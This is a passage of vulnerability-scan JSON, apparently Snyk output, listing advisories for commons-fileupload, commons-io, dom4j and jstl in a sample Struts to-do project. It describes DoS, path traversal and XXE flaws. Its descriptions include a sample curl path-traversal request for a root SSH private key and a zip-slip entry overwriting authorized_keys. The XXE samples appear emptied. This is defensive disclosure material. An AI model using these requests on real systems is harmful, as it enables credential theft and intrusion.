"filePath": "org/apache/commons/fileupload/FileUploadBase.java", + "className": "FileUploadBase", + "functionName": "parseRequest" + } + }, + { + "version": [ + "[,1.0-rc1)" + ], + "functionId": { + "filePath": "org/apache/commons/fileupload/FileUpload.java", + "className": "FileUpload", + "functionName": "parseRequest" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-fileupload:commons-fileupload", + "references": [ + { + "url": "https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml%23L56", + "title": "Github ChangeLog" + }, + { + "url": "https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814", + "title": "GitHub Commit" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + 
"modificationTime": "2024-03-06T14:03:17.073322Z" + } + ], + "description": "## Overview\r\n[`commons-fileupload:commons-fileupload`](https://commons.apache.org/proper/commons-fileupload/) provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\r\n\r\nAffected versions of the package are vulnerable to Information Disclosure because the `InputStream` is not closed on exception.\r\n\r\n## Remediation\r\nUpgrade `commons-fileupload` to version 1.3.2 or higher.\r\n\r\n## References\r\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml#L56)\r\n- [Github Commit](https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814)", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-200" + ] + }, + "packageName": "commons-fileupload:commons-fileupload", + "proprietary": false, + "creationTime": "2017-10-01T08:05:48.497000Z", + "functions_new": [ + { + "version": [ + "[1.2.0 ,1.3.2)" + ], + "functionId": { + "className": "org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl", + "functionName": "" + } + }, + { + "version": [ + "[1.0-rc1,1.2.0)" + ], + "functionId": { + "className": "org.apache.commons.fileupload.FileUploadBase", + "functionName": "parseRequest" + } + }, + { + "version": [ + "[,1.0-rc1)" + ], + "functionId": { + "className": "org.apache.commons.fileupload.FileUpload", + "functionName": "parseRequest" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2014-02-17T22:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-fileupload", + "artifactId": "commons-fileupload" + }, + "publicationTime": "2017-02-17T08:05:48Z", + 
"severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T14:03:17.073322Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.30", + "commons-fileupload:commons-fileupload@1.3.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-fileupload:commons-fileupload", + "version": "1.3.1" + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-3326457", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Jakob Ackermann" + ], + "semver": { + "vulnerable": [ + "[1.0-beta-1, 1.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-fileupload:commons-fileupload", + "references": [ + { + "url": "https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy", + "title": "Apache Mailing List" + }, + { + "url": "https://github.com/apache/commons-fileupload/commit/0a306f75949f2e9f5f92c400cad39d20117a2eb0", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/tomcat/commit/063e2e81ede50c287f737cc8e2915ce7217e886e", + "title": "GitHub Commit (Tomcat)" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:57.097583Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:59.094771Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:59.806365Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:49.130585Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:57.097583Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:59.094771Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.806365Z" + } + ], + "description": "## Overview\n[commons-fileupload:commons-fileupload](https://mvnrepository.com/artifact/commons-fileupload/commons-fileupload) is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) when an attacker sends a large number of request parts in a series of uploads or a single multipart upload.\r\n\r\n**NOTE:** After upgrading to the fixed version, the `setFileCountMax()` must be explicitly set to avoid this vulnerability.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a 
system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `commons-fileupload:commons-fileupload` to version 1.5 or higher.\n## References\n- [Apache Mailing List](https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy)\n- [GitHub Commit](https://github.com/apache/commons-fileupload/commit/0a306f75949f2e9f5f92c400cad39d20117a2eb0)\n- [GitHub Commit](https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17)\n- [GitHub Commit (Tomcat)](https://github.com/apache/tomcat/commit/063e2e81ede50c287f737cc8e2915ce7217e886e)\n", + "epssDetails": { + "percentile": "0.91407", + "probability": "0.03359", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-24998" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "commons-fileupload:commons-fileupload", + "proprietary": false, + "creationTime": "2023-02-21T08:19:49.294883Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-02-21T08:00:22Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-fileupload", + "artifactId": "commons-fileupload" + }, + "publicationTime": "2023-02-21T09:23:34.093821Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.806365Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@6.1.2", + "commons-fileupload:commons-fileupload@1.5" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-fileupload:commons-fileupload", + "version": "1.3.1" + }, + { + 
"id": "SNYK-JAVA-COMMONSIO-1277109", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F", + "credit": [ + "Lukas Euler" + ], + "semver": { + "vulnerable": [ + "[0, 2.7)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-io:commons-io", + "references": [ + { + "url": "https://github.com/apache/commons-io/commit/fe7543eee5cd4b2f9e78aa44c31031b68eba204d", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/IO-556", + "title": "Jira Issue" + }, + { + "url": "https://github.com/AlAIAL90/CVE-2021-29425", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:49:20.715148Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.8, + "modificationTime": "2024-03-11T09:51:34.519777Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.8, + "modificationTime": "2024-03-11T09:53:56.345148Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:37.151008Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:20.715148Z" + }, + { + "type": "secondary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:34.519777Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:56.345148Z" + } + ], + "description": "## Overview\n[commons-io:commons-io](https://search.maven.org/artifact/commons-io/commons-io) is a The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.\n\nAffected versions of this package are vulnerable to Directory Traversal via calling the method FileNameUtils.normalize using an improper string like `//../foo` or `\\\\..\\foo`, which may allow access to files in the parent directory.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). 
In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `commons-io:commons-io` to version 2.7 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/commons-io/commit/fe7543eee5cd4b2f9e78aa44c31031b68eba204d)\n- [Jira Issue](https://issues.apache.org/jira/browse/IO-556)\n- [PoC](https://github.com/AlAIAL90/CVE-2021-29425)\n", + "epssDetails": { + "percentile": "0.54510", + "probability": "0.00171", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-29425" + ], + "CWE": [ + "CWE-20", + "CWE-22" + ], + "GHSA": [ + "GHSA-gwrp-pvrq-jmwv" + ] + }, + "packageName": "commons-io:commons-io", + "proprietary": false, + "creationTime": "2021-04-27T10:51:05.462338Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-04-26T16:04:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-io", + "artifactId": "commons-io" + }, + "publicationTime": "2021-04-27T14:26:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:56.345148Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-io:commons-io@2.2" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@6.0.0", + "commons-io:commons-io@2.9.0" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-io:commons-io", + "version": "2.2" + }, + { + "id": "SNYK-JAVA-DOM4J-174153", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "credit": [ + "Mario Areias" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of 
Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/Namespace.java", + "className": "Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/QName.java", + "className": "QName", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/dom4j/dom4j/issues/48", + "title": "GitHub Issue" + }, + { + "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", + "title": "POC: Ihacktoprotect Blog" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:55.789489Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, 
+ { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", + "epssDetails": { + "percentile": "0.70906", + "probability": "0.00325", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1000632" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-6pcc-3rfx-4gpm" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2019-04-10T16:07:04.634619Z", + "functions_new": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.QName", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-01T19:12:29Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2018-08-21T14:16:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.900402Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "dom4j:dom4j", + "version": "1.6.1" + }, + { + "id": "SNYK-JAVA-DOM4J-2812975", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/a822852", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:31.083245Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "type": "secondary", + "vector": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", + "epssDetails": { + "percentile": "0.79800", + "probability": "0.00664", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10683" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-hwj3-m3p6-hj38" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2022-05-10T12:56:27.582369Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-15T09:38:17Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2020-04-16T15:22:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.985080Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "dom4j:dom4j", + "version": "1.6.1" + }, + { + "id": "SNYK-JAVA-JAVAXSERVLET-30449", + "title": "XML External Entity (XXE) Injection", + 
"CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "credit": [ + "David Jorm" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "javax.servlet:jstl", + "references": [ + { + "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", + "title": "Apache Mail Archive" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", + "title": "NVD" + }, + { + "url": "https://access.redhat.com/security/cve/CVE-2015-0254", + "title": "RedHat CVE Database" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "cvssV3BaseScore": 7.6, + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:43.270072Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "description": "## 
